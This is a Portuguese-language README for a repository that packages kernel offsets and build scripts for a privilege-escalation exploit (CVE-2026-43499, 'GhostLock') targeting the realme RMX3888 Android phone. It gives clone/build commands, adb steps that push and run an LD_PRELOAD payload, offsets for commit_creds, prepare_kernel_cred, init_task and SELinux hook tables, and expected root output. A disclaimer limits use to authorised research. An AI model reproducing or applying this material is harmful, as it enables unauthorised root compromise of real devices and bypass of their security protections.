
rmx3888-cve-2026-43499-config v0.2.0
CVE-2026-43499 configuração de exploit para realme RMX3888 (Android 16) - 20 offsets de kernel verificados
Configuração do Exploit CVE-2026-43499 para realme RMX3888
Informações do dispositivo
- Marca/Modelo: realme RMX3888
- Versão do Android: 16 (SDK 36)
- ID do build: BP2A.250605.015
- Kernel: Linux 6.1.141-android14-11-o-gffc54a6d2287
- SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
- Arquitetura: ARM64 (aarch64)
Visão geral
Este repositório contém os arquivos de configuração completos para o exploit CVE-2026-43499 (GhostLock) direcionado ao dispositivo realme RMX3888. Todos os offsets de kernel foram extraídos e verificados a partir do boot.img do dispositivo.
Recursos
✓ 20 offsets de kernel verificados extraídos do vmlinux
✓ Logging em tempo real com O_SYNC + fsync para segurança contra kernel panic
✓ Configuração específica do dispositivo para RMX3888
✓ Script de compilação com um clique com detecção automática do NDK
✓ Documentação abrangente com guias de build
Arquivos incluídos
Arquivos de configuração
- arget.h - Offsets de kernel específicos do dispositivo (20 offsets verificados)
- common.h - Configuração de build com integração de logging
- ealtime_log.h - Implementação de logging em tempo real
Documentação
- BUILD_GUIDE.md - Guia de compilação completo
- eport.md - Relatório de análise detalhado (Rodada 1)
- ound2_report.md - Relatório de configuração (Rodada 2)
- ROUND2_STATUS.md - Resumo do status de execução
- compile_status.json - Status de build legível por máquina
Scripts
- compile_rmx3888.sh - Script de compilação com um clique
Início rápido
Pré-requisitos
- Android NDK r26d ou posterior
- Ambiente Git Bash, Linux/WSL ou Termux
Compilação
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
No Git Bash do Windows, o script detecta automaticamente o caminho padrão do SDK usado pelo Android Studio e pelas ferramentas de linha de comando: /c/Android/Sdk/ndk/*.
Nota: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL e COPY_SPLICE_READ atualmente usam fallbacks compatíveis com build no cabeçalho do alvo RMX3888. Substitua-os por offsets vmlinux RMX3888 verificados antes de depender do comportamento em tempo de execução.
Uso
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
Offsets principais
Os principais offsets abaixo foram extraídos do kernel 6.1.141. Consulte a nota acima para entradas de fallback compatíveis com build que ainda precisam de verificação específica do RMX3888.
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
Recursos de logging
O módulo de logging em tempo real integrado fornece:
- Caminho de log principal: /sdcard/Download/log_.txt
- Caminho de fallback: /data/local/tmp/log_.txt
- Seguro contra kernel panic: Usa O_SYNC + fsync() para gravação imediata em disco
- Entradas com timestamp: Todas as entradas de log incluem timestamps precisos
- Espelhamento em stderr: Os logs também são enviados para stderr para o adb logcat
Resultados esperados
Exploração bem-sucedida
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
Saída do arquivo de log
` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
Solução de problemas
Consulte BUILD_GUIDE.md para instruções detalhadas de solução de problemas, incluindo:
- Erros de compilação
- Falhas em tempo de execução
- Problemas de bypass do KASLR
- Bloqueios de política SELinux
Aviso de segurança
⚠️ AVISO: Esta configuração é apenas para pesquisa de segurança autorizada.
- Use apenas em dispositivos que você possui
- Não distribua binários compilados sem autorização
- Respeite as práticas de divulgação responsável
- Os arquivos de log podem conter informações confidenciais do sistema
Detalhes técnicos
Processo de extração
- Boot.img descompactado usando o parser Android Boot Image v4
- vmlinux extraído usando vmlinux-to-elf (102.871 símbolos)
- 99.580 símbolos válidos analisados e processados
- 20 offsets críticos validados de forma cruzada
- Verificação de offsets por meio de verificações de consistência de endereços de símbolos
Verificação de offsets
- Endereço base do kernel confirmado: 0xffffffc008000000
- Todos os endereços de símbolos validados contra o layout de memória
- Referenciado de forma cruzada com o dispositivo de referência (Google Pixel tokay)
- Taxa de sucesso de extração de 100% (20/20 offsets)
Referências
- CVE-2026-43499: GhostLock - Vulnerabilidade UAF do alocador Ion
- Fonte do Exploit: https://github.com/NebuSec/CyberMeowfia
- Dispositivo Alvo: realme RMX3888 (Snapdragon 8 Gen 3)
Licença
Esta configuração é fornecida apenas para fins educacionais e de pesquisa em segurança.
Aviso legal
Este repositório contém materiais de pesquisa em segurança. Os autores e contribuidores não são responsáveis por qualquer uso indevido ou dano causado por este código. Use por sua conta e risco e apenas em dispositivos que você possui ou para os quais tenha autorização explícita para testar.
Gerado: 2026-07-23
Versão do kernel: 6.1.141-android14-11-o-gffc54a6d2287
Verificação de offsets: 100% (20/20)
Status: Pronto para compilação